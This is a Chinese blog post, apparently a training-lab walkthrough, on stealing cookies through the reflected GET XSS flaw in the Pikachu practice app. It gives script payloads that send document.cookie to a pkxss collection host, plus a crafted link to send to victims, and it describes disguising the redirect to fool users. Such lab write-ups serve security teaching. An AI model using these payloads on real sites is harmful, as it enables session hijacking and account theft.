4.XSS-反射型(get)利用:获取cookie

最新推荐文章于 2024-06-23 09:00:00 发布
最新推荐文章于 2024-06-23 09:00:00 发布
阅读量354 收藏 3
点赞数 5
分类专栏: 网络安全web测试之xss与暴漏破解 文章标签: xss 前端 cookie
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/139701391
版权

GET反射型XSS利用:获取cookie

在这里插入图片描述

修改一下配置文件\pikachu\pkxss\xcookie\cookie.php
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。重定向到pikachu主页面
在这里插入图片描述

基于IP搭建的pkxss平台(入侵者的IP地址)

<script>document.location = 'http://192.168.2.160/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

我这里基于域名搭建的pkxss平台

<script>document.location = 'http://www.pikachu.net/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

输入基于域名的搭建的pkxss,在搜索框里输入链接
在这里插入图片描述

在皮卡丘里面的xss后台进入cookie收集
在这里插入图片描述

就能获取到用户的IP,cookie值,refer二,ua等相关信息
在这里插入图片描述

可以将referer的链接发送给对应的要攻击的用户

http://www.pikachu.net/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fwww.pikachu.net%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

如下获取相关数据对应的信息
在这里插入图片描述

愿听风成曲
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1756
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
XSS获取COOKIE
04-20
XSS获取COOKIE
5.XSS-反射(post)利用获取cookie
最新发布
愿听风成曲
06-23 301
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常网站去访问。基于IP地址配置文件。
基于dvwa的反射xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1398
好切回正题,这段代码的是正则表达意思就是把这些'/
反射xss偷取cookie(本地验证)
think_ycx的专栏
11-14 3185
原理反射xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
xss收集cookie方法(以pikachu靶场举例)
weixin_59047731的博客
01-13 854
本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
XSS攻击通常分为反射、存储和DOM三种类,而JavaScript是实现这些攻击的关键工具,因为它可以动态修改网页内容,执行恶意操作。 实验内容主要分为两个部分:安装Beef-xss工具和在实际网站上进行XSS攻击。...
Python-XSSFinder用于检测网站中反射xss工具集
08-10
**Python XSSFinder:网站反射XSS检测工具集** XSSFinder是一款基于Python开发的工具,专门用于检测网站中存在的反射跨站脚本(Reflected Cross-Site Scripting,简称XSS)漏洞。XSS攻击是一种常见的网络安全...
Web应用安全:简单XSS测试脚本(实验).docx
06-19
- 在测试平台上选择“反射XSS(GET)”,尝试输入球员名字,观察回显情况。 - 输入`<script>alert('xss')</script>`,但由于长度限制无法完整输入。通过F12修改输入框长度,重新输入后成功弹出警告框。 2. **...
使用Django简单编写一个XSS平台的方法步骤
01-20
XSS攻击主要分为三种类:存储XSS反射XSS和DOMXSS。攻击者通常通过在用户输入字段中注入恶意脚本,然后当其他用户查看这些含有恶意脚本的页面时,脚本会被执行。例如,存储XSS将恶意脚本存储在服务器上,...
反射xss攻击代码.rar
05-14
xss攻击(java实现反射xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
xss_talk:我的XSS演讲的幻灯片和演示应用程序
05-22
- 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 - 传播恶意软件:在受害者的浏览器上执行恶意脚本,下载并安装病毒或木马。 3. XSS防护策略: - 输入验证:对用户提交的数据进行严格的过滤和校验...
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4863
渗透测试-跨站脚本攻击xss获取cookie
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4464
演示用靶场:dvwa
-----已搬运-----反射xss获取cookie(本地实现)
Zero_Adam的博客
02-17 2107
目录:1.最简单的反射xss获取cookie注意!!!! 1.最简单的反射xss获取cookie <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 721
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
dvwa中 利用反射xss获取cookie进行会话的劫持演示
qq_35420342的博客
04-08 7609
首先打开dvwa,设置安全等级为low:输入&lt;script&gt;alert(11)&lt;/script&gt;证明弹窗:编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:构造如下URL,并发送给被攻击者:原始URL: http://location/dvwa/vulnerabilities/xss_...
Java的堆外内存,可以用以下哪个参数设置最大值 A. -XX:MaxDirectMemorySize B. -Xmx C. -XX:MaxPermSize D. –Xss
06-01
选项 A. -XX:MaxDirectMemorySize 可以用于...选项 -Xmx 是用于设置 Java 堆的最大大小,选项 -XX:MaxPermSize 是用于设置永久代的最大大小,选项 -Xss 是用于设置每个线程的堆栈大小。它们都与堆外内存的设置无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值